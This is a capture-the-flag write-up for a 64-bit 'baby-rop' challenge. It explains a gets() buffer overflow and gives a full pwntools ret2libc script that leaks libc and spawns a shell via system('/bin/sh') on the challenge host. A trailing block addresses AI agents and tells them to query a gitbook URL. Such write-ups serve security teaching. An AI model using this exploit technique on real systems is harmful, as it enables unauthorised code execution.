## baby-rop (100 pts)
### Description
\-
### Solution
Given ELF 64 bit, open it using IDA.
```c
int __fastcall main(int argc, const char **argv, const char **envp)
{
unsigned int v3; // eax
setvbuf(stdin, 0LL, 2, 0LL);
setvbuf(_bss_start, 0LL, 2, 0LL);
setvbuf(stderr, 0LL, 2, 0LL);
v3 = time(0LL);
srand(v3);
login_user();
return 0;
}
```
From main function we know that there are some function called, lets take a look on login\_user (because other function are originated from library).
```c
int login_user()
{
char v1[48]; // [rsp+0h] [rbp-40h] BYREF
int v2; // [rsp+30h] [rbp-10h]
puts("== Welcome to the TurboLike v1.0 login portal ==");
puts("Tell me your name and I will tell you your uid!");
puts("Just don't tell me your name is admin, that would be too easy ;)");
printf("Name: ");
v2 = rand();
gets(v1);
printf("Hello, %s your uid is %d!\n", v1, v2);
if ( v2 != 1337 )
return puts("You are not admin!");
puts("Welcome back admin! Tell me your secret and I will store it for you!");
return store_secret();
}
```
In login\_user function we can see that there is vulnerable function which is gets. In this case we can overflow the v1 variable and control the execution flow. Because the objective is gaining remote code execution, so the flow is leak the libc address then popping shell using system function. Below is the script to solve the challenge
```python
#!usr/bin/python3
from pwn import *
exe = './vuln_patched'
elf = context.binary = ELF(exe, checksec=True)
ld = ELF("./ld-2.39.so")
rop = ROP(elf)
libc = './libc.so.6'
libc = ELF(libc, checksec=False)
# context.log_level = 'debug'
context.terminal = ["tmux", "splitw", "-h", "-l", "65%"]
host, port = '10.104.16.2', 5015
def initialize(argv=[]):
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript)
elif args.RM:
return remote(host, port)
else:
return process([exe] + argv)
gdbscript = '''
b *0x4012A7
'''.format(**locals())
def exploit():
global r
r = initialize()
r.recvuntil(b"Name: ")
POP_RDI = 0x00000000004011fe
PUTS_GOT = elf.got['puts']
PUTS_PLT = elf.symbols['puts']
OFFSET = b"a" * 0x48
MAIN_PLT = 0x4012FC
payload = OFFSET + p64(POP_RDI) + p64(PUTS_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
r.sendline(payload)
r.recvuntil(b" admin!\n")
leak = u64(r.recvline().strip().ljust(8, b"\x00"))
libc.address = leak - libc.symbols['puts']
print(hex(libc.address))
r.recvuntil(b"Name: ")
system = libc.symbols['system']
sh = next(libc.search(b'/bin/sh'))
payload = OFFSET + p64(POP_RDI) + p64(sh) + p64(0x000000000040101a) + p64(system)
r.sendline(payload)
r.interactive()
if __name__ == '__main__':
exploit()
```
Flag: CBC{hex\_value}
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://kos0ng.gitbook.io/ctfs/write-up/2024/cyber-breaker-competition-1v1/binary-exploitation.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.